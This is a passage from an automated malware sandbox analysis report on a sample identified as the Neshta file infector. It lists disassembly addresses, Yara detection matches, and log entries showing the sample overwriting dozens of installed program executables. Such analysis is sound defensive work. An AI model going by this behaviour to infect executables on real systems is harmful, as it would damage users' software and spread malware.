                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00410778 push 00406D36h; ret 0_2_004107C6
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040D7C0 push 00403D79h; ret 0_2_0040D809
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040D9F0 push 00403F84h; ret 0_2_0040DA14
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DA28 push 00403FBCh; ret 0_2_0040DA4C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00411AC4 push 00408052h; ret 0_2_00411AE2
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00410B3C push 004070D0h; ret 0_2_00410B60
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DC70 push 00404204h; ret 0_2_0040DC94
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DC38 push 004041CCh; ret 0_2_0040DC5C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00406CE0 push 00406D36h; ret 0_2_00406D2E
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DCEE push 00404284h; ret 0_2_0040DD14
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DCF0 push 00404284h; ret 0_2_0040DD14
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DCA8 push 0040423Ch; ret 0_2_0040DCCC
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DD60 push 004042F4h; ret 0_2_0040DD84
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_00403D28 push 00403D79h; ret 0_2_00403D71
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DD28 push 004042BCh; ret 0_2_0040DD4C
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DDD0 push 00404364h; ret 0_2_0040DDF4
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeCode function: 0_2_0040DD98 push 0040432Ch; ret 0_2_0040DDBC

                  Persistence and Installation Behavior:

                  barindex
                  Yara detected NeshtaShow sources
                  Source: Yara matchFile source: Z68mMCAxFZ.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Z68mMCAxFZ.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Z68mMCAxFZ.exe PID: 6284, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Windows\svchost.com, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Infects executable files (exe, dll, sys, html)Show sources
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXEJump to behavior
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXEJump to behavior
